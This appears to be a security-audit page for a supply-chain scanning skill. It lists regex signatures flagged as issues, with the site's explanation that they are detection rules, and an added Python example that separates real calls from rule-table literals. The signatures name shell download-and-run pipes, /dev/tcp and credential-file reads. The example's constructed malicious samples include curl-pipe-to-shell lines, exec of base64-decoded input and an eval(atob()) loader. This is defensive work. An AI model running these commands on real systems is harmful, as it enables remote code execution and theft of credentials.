supply-chain-audit
Runs multi-language supply-chain audits to detect dependency poisoning and harden projects against supply-chain attacks.
Security score
The supply-chain-audit skill was audited on May 12, 2026; the scan reported 71 security issues across 6 threat categories, 33 of them high-severity. Review the findings below before installing, and read the quoted source with the skill's purpose in mind: it is itself a pattern-based scanner, so most of the flagged lines are its own signature table (regex tuples and keyword lists), and the label strings inside those tuples, such as `'eval(): ...'`, contain exactly the text the rules look for. Those lines match the audit's patterns without executing anything. The `os.path.expanduser` hits are the script locating toolchain and package directories (`~/.pyenv`, `~/.nvm`, `~/.cargo`, `~/.gem`, `~/.rbenv`) and writing its own reports under `~/.claude/audit-reports/`. The one place it actually decodes data is line 1036, where a matched string is base64-decoded, which is the kind of step a scanner takes to inspect an encoded blob rather than to run it.
Security Issues
Direct command execution function call
| 37 | (r'import\s+.*exec\s*\(', 'import + exec(): dynamic code execution'), |
Direct command execution function call
| 887 | (r'\bexec\s*\(', 'HIGH', 'exec(): dynamic code execution'), |
Eval function call - arbitrary code execution
| 38 | (r'import\s+.*eval\s*\(', 'import + eval(): dynamic expression evaluation'), |
Eval function call - arbitrary code execution
| 231 | (r'eval\s*\(\s*Buffer\.from\s*\(', 'eval(Buffer.from(...)): encoded obfuscation + execution'), |
Eval function call - arbitrary code execution
| 232 | (r'eval\s*\(\s*atob\s*\(', 'eval(atob(...)): base64 decode + execution'), |
Eval function call - arbitrary code execution
| 233 | (r'eval\s*\(\s*require\s*\(', 'eval(require(...)): dynamic load + execution'), |
Eval function call - arbitrary code execution
| 249 | (r'eval\s*\(', 'eval(): dynamic code execution'), |
Eval function call - arbitrary code execution
| 654 | (r'eval\s*\(\s*Base64\.decode64', 'eval(Base64.decode64(...)): decode and execute'), |
Eval function call - arbitrary code execution
| 886 | (r'\beval\s*\(', 'HIGH', 'eval(): dynamic code execution'), |
Eval function call - arbitrary code execution
| 924 | (r'eval\s*\(\s*Buffer\.from\s*\(', 'CRITICAL', 'eval(Buffer.from(...)): encoded obfuscation + execution'), |
Eval function call - arbitrary code execution
| 925 | (r'eval\s*\(\s*atob\s*\(', 'CRITICAL', 'eval(atob(...)): base64 + execution'), |
Piping content to bash shell
| 300 | if any(kw in cmd.lower() for kw in ['curl ','wget ','http://','https://','eval ','base64','powershell','/dev/tcp','|sh','| sh','|bash','| bash']): |
Piping content to bash shell
| 462 | (r'//go:generate\s+(?:curl|wget|sh|bash|python)', '//go:generate executes dangerous command'), |
Piping content to bash shell
| 570 | (r'Command::new\s*\(\s*["\'](?:curl|wget|bash|sh|powershell)', 'build.rs executes dangerous command'), |
Piping content to bash shell
| 651 | (r'system\s*\(\s*["\'](?:curl|wget|bash|sh|powershell)', 'system() executes dangerous command'), |
Piping content to bash shell
| 652 | (r'`(?:curl|wget|bash|sh).*`', 'backtick execution of dangerous command'), |
Piping content to bash shell
| 653 | (r'IO\.popen.*(?:curl|wget|sh|bash)', 'IO.popen executes dangerous command'), |
Piping content to bash shell
| 907 | (r'`[^`]*(?:curl|wget|bash|sh)[^`]*`', 'CRITICAL', 'backtick execution of dangerous command'), |
Piping content to sh shell
| 239 | (r'spawn\s*\(\s*[\'"](?:bash|sh|cmd|powershell)', 'spawn shell: starts a shell process'), |
Piping content to sh shell
| 300 | if any(kw in cmd.lower() for kw in ['curl ','wget ','http://','https://','eval ','base64','powershell','/dev/tcp','|sh','| sh','|bash','| bash']): |
Piping content to sh shell
| 462 | (r'//go:generate\s+(?:curl|wget|sh|bash|python)', '//go:generate executes dangerous command'), |
Piping content to sh shell
| 570 | (r'Command::new\s*\(\s*["\'](?:curl|wget|bash|sh|powershell)', 'build.rs executes dangerous command'), |
Piping content to sh shell
| 651 | (r'system\s*\(\s*["\'](?:curl|wget|bash|sh|powershell)', 'system() executes dangerous command'), |
Piping content to sh shell
| 652 | (r'`(?:curl|wget|bash|sh).*`', 'backtick execution of dangerous command'), |
Piping content to sh shell
| 653 | (r'IO\.popen.*(?:curl|wget|sh|bash)', 'IO.popen executes dangerous command'), |
Piping content to sh shell
| 881 | (r'curl\s+.*\|\s*(?:bash|sh|zsh|python|perl|ruby)', 'CRITICAL', 'curl pipe to shell: downloads and executes remote script'), |
Piping content to sh shell
| 882 | (r'wget\s+.*\|\s*(?:bash|sh|zsh|python|perl|ruby)', 'CRITICAL', 'wget pipe to shell: downloads and executes remote script'), |
Piping content to sh shell
| 883 | (r'base64\s+(?:-D|--decode)\s*\|\s*(?:bash|sh|zsh)', 'CRITICAL', 'base64 decode pipe to shell: obfuscated backdoor'), |
Piping content to sh shell
| 884 | (r'\|\s*base64\s+(?:-D|--decode)\s*\|\s*(?:bash|sh|zsh)', 'CRITICAL', 'piped base64 decode+execute'), |
Piping content to sh shell
| 907 | (r'`[^`]*(?:curl|wget|bash|sh)[^`]*`', 'CRITICAL', 'backtick execution of dangerous command'), |
System command execution
| 651 | (r'system\s*\(\s*["\'](?:curl|wget|bash|sh|powershell)', 'system() executes dangerous command'), |
System command execution
| 890 | (r'os\.system\s*\(', 'HIGH', 'os.system(): unsafe command execution'), |
System command execution
| 906 | (r'system\s*\(\s*["\']', 'HIGH', 'system(): command execution'), |
Node child_process module reference
| 236 | (r'child_process.*exec\s*\(', 'child_process.exec: executes system command'), |
Node child_process module reference
| 237 | (r'require\s*\(\s*[\'"]child_process[\'"]\s*\)', 'require child_process: imports command-execution module'), |
Node child_process module reference
| 897 | (r'require\s*\(\s*[\'"]child_process[\'"]\s*\)', 'HIGH', 'require child_process'), |
Node child_process module reference
| 898 | (r'child_process.*exec\s*\(', 'HIGH', 'child_process.exec: command execution'), |
Python os.system command execution
| 890 | (r'os\.system\s*\(', 'HIGH', 'os.system(): unsafe command execution'), |
Curl to non-GitHub URL
| 300 | if any(kw in cmd.lower() for kw in ['curl ','wget ','http://','https://','eval ','base64','powershell','/dev/tcp','|sh','| sh','|bash','| bash']): |
Wget to non-GitHub URL
| 300 | if any(kw in cmd.lower() for kw in ['curl ','wget ','http://','https://','eval ','base64','powershell','/dev/tcp','|sh','| sh','|bash','| bash']): |
Access to /etc/passwd
| 1003 | (r'/etc/passwd|/etc/shadow', 'CRITICAL', 'password file access'), |
Access to /etc/shadow
| 1003 | (r'/etc/passwd|/etc/shadow', 'CRITICAL', 'password file access'), |
Access to hidden dotfiles in home directory
| 95 | pyenv_root = os.environ.get('PYENV_ROOT', os.path.expanduser('~/.pyenv')) |
Access to hidden dotfiles in home directory
| 194 | rdir = os.path.expanduser('~/.claude/audit-reports') |
Access to hidden dotfiles in home directory
| 268 | os.path.expanduser('~/.npm-global/lib/node_modules'), |
Access to hidden dotfiles in home directory
| 271 | os.path.expanduser('~/.nvm/versions/node'), |
Access to hidden dotfiles in home directory
| 424 | rdir = os.path.expanduser('~/.claude/audit-reports') |
Access to hidden dotfiles in home directory
| 590 | cargo_home = os.environ.get('CARGO_HOME', os.path.expanduser('~/.cargo')) |
Access to hidden dotfiles in home directory
| 668 | os.path.expanduser('~/.gem/ruby'), os.path.expanduser('~/.rbenv/versions'), |
Access to hidden dotfiles in home directory
| 1194 | rdir = os.path.expanduser('~/.claude/audit-reports') |
Access to hidden dotfiles in home directory
| 1241 | Reports saved to ~/.claude/audit-reports/ |
Access to hidden dotfiles in home directory
| 1256 | - JSON reports are saved to `~/.claude/audit-reports/supply-chain-{ecosystem}-{timestamp}.json` |
Access to AWS credentials directory
| 965 | (r'open\s*\([^)]*[\'"].*(?:\.aws/credentials|\.aws/config)[\'"]', 'CRITICAL', 'reads AWS credentials'), |
Access to .env file
| 92 | for venv_name in ('.venv', 'venv', 'env', '.env'): |
Access to .env file
| 240 | (r'\.readFileSync\s*\(.*(?:\.ssh|\.aws|\.npmrc|\.env|credentials)', 'reads sensitive credential file'), |
Access to .env file
| 241 | (r'process\.env\b.*(?:KEY|SECRET|TOKEN|PASSWORD|CREDENTIAL)', 'reads sensitive environment variable'), |
Access to .env file
| 573 | (r'fs::read_to_string.*(?:\.ssh|\.aws|credential|\.env)', 'build.rs reads credential file'), |
Access to .env file
| 972 | (r'open\s*\([^)]*[\'"].*\.env[\'"]', 'HIGH', 'reads .env file'), |
Access to .env file
| 981 | (r'\.readFileSync\s*\(.*(?:\.ssh|\.aws|\.npmrc|\.env|credentials)', 'CRITICAL', 'readFileSync reads credentials'), |
Access to .env file
| 982 | (r'process\.env\b.*(?:KEY|SECRET|TOKEN|PASSWORD|CREDENTIAL)', 'HIGH', 'process.env reads sensitive variable'), |
Access to system keychain/keyring
| 962 | (r'keyring\.get_password\s*\(', 'MEDIUM', 'system keychain access'), |
Base64 decode operation
| 39 | (r'import\s+.*\bbase64\b.*decode', 'import + base64 decode: encoded obfuscated payload'), |
Base64 decode operation
| 654 | (r'eval\s*\(\s*Base64\.decode64', 'eval(Base64.decode64(...)): decode and execute'), |
Base64 decode operation
| 847 | if re.search(r'eval\s*\(|base64_decode|exec\s*\(|system\s*\(|passthru|shell_exec|curl_exec', content): |
Base64 decode operation
| 883 | (r'base64\s+(?:-D|--decode)\s*\|\s*(?:bash|sh|zsh)', 'CRITICAL', 'base64 decode pipe to shell: obfuscated backdoor'), |
Base64 decode operation
| 884 | (r'\|\s*base64\s+(?:-D|--decode)\s*\|\s*(?:bash|sh|zsh)', 'CRITICAL', 'piped base64 decode+execute'), |
Base64 decode operation
| 915 | (r'base64\.(?:b64decode|decodebytes)\s*\(', 'MEDIUM', 'base64 decode (possible obfuscation)'), |
Base64 decode operation
| 1036 | decoded = base64.b64decode(m.group(0)).decode('utf-8', errors='ignore') |
Base64 decode via atob()
| 232 | (r'eval\s*\(\s*atob\s*\(', 'eval(atob(...)): base64 decode + execution'), |
Base64 decode via atob()
| 925 | (r'eval\s*\(\s*atob\s*\(', 'CRITICAL', 'eval(atob(...)): base64 + execution'), |
External URL reference
| 571 | (r'Command::new.*\.arg.*(?:http://|https://)', 'build.rs downloads remote content'), |
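The findings above come from line-oriented regex matching, and most of the matched lines are themselves signature definitions: the label string `'eval(): ...'` inside a rule tuple contains the very text `eval(` that the rule `\beval\s*\(` looks for, so a scanner that applies the same kind of rule to the skill's source flags the table. The script below is an added example, not code from the skill or from the auditing site. It re-implements a handful of the quoted rules (this subset, its labels and its severities are the example's own), runs them over constructed samples, and then uses Python's `ast` module to keep a hit only where the line holds a real call to a dangerous name or passes a string literal straight into a call, so a bare rule table is reported as a literal-only match instead of an execution finding.

```python
import ast
import re

# Signatures in the shape of the skill's quoted rule tuples (pattern, severity,
# label). This subset, its labels and severities are this example's own.
SIGNATURES = [
    (r'\beval\s*\(', 'HIGH', 'eval(): dynamic code execution'),
    (r'eval\s*\(\s*atob\s*\(', 'CRITICAL', 'eval(atob(...)): base64 decode + execution'),
    (r'\bexec\s*\(', 'HIGH', 'exec(): dynamic code execution'),
    (r'curl\s+.*\|\s*(?:bash|sh|zsh|python|perl|ruby)', 'CRITICAL', 'curl pipe to shell'),
    (r'os\.system\s*\(', 'HIGH', 'os.system(): unsafe command execution'),
    (r'base64\.(?:b64decode|decodebytes)\s*\(', 'MEDIUM', 'base64 decode (possible obfuscation)'),
]

# Names whose *call* (not mere mention) is what these signatures intend to catch.
EXEC_NAMES = {'eval', 'exec', 'os.system', 'subprocess.run', 'subprocess.Popen',
              'subprocess.call', 'base64.b64decode', 'base64.decodebytes'}


def regex_scan(text):
    """Line-oriented scan in the skill's style: every regex hit is a finding."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for pattern, severity, label in SIGNATURES:
            if re.search(pattern, line):
                findings.append((lineno, severity, label))
    return findings


def _dotted(node):
    """'os.system' for Attribute(Name('os'), 'system'); None for other shapes."""
    if isinstance(node, ast.Name):
        return node.id
    if isinstance(node, ast.Attribute):
        base = _dotted(node.value)
        return f'{base}.{node.attr}' if base else None
    return None


def executing_lines(source):
    """Lines of Python source on which a regex hit could actually run something:
    a call to an EXEC_NAMES function, or a string literal handed directly to a
    call (e.g. subprocess.run("curl ... | sh", shell=True)). A literal that only
    sits inside a tuple or list, like a scanner's rule table, is not counted."""
    lines = set()
    for node in ast.walk(ast.parse(source)):
        if not isinstance(node, ast.Call):
            continue
        if _dotted(node.func) in EXEC_NAMES:
            lines.add(node.lineno)
        for arg in list(node.args) + [kw.value for kw in node.keywords]:
            if isinstance(arg, ast.Constant) and isinstance(arg.value, str):
                lines.add(arg.lineno)
    return lines


def ast_aware_scan(source):
    """Split regex findings on Python source into (kept, literal_only)."""
    live = executing_lines(source)
    kept, literal_only = [], []
    for finding in regex_scan(source):
        (kept if finding[0] in live else literal_only).append(finding)
    return kept, literal_only


# Constructed sample 1: a rule table shaped like the skill's own source.
RULE_TABLE = r"""RULES = [
    (r'\beval\s*\(', 'HIGH', 'eval(): dynamic code execution'),
    (r'base64\.b64decode\s*\(', 'MEDIUM', 'base64.b64decode(): possible obfuscation'),
]
"""

# Constructed sample 2: a genuinely malicious install hook written in Python.
MALICIOUS = r"""import os, subprocess, base64
payload = base64.b64decode(os.environ.get('P', ''))
exec(payload)
subprocess.run("curl https://example.invalid/x.sh | sh", shell=True)
os.system('id')
"""

# Constructed samples 3 and 4: non-Python inputs, regex pass only.
INSTALL_SH = "curl -fsSL https://example.invalid/install.sh | bash\n"
JS_LOADER = 'eval(atob("Y29uc29sZS5sb2coMSk="));\n'


if __name__ == '__main__':
    for name, src in (('rule table', RULE_TABLE), ('malicious hook', MALICIOUS)):
        kept, literal_only = ast_aware_scan(src)
        print(f'{name}: {len(kept)} real, {len(literal_only)} literal-only')
    print('install.sh:', regex_scan(INSTALL_SH))
    print('loader.js:', regex_scan(JS_LOADER))
```

On the rule-table sample both regex hits land on label strings inside tuples and are reported as literal-only; on the malicious sample all four hits sit on lines with real calls and are kept. The AST pass only applies to Python and deliberately errs toward keeping: a literal passed to `re.search(...)`, as in the skill's line 847, still counts as live because it is a call argument, and for shell or JavaScript inputs only the regex pass runs.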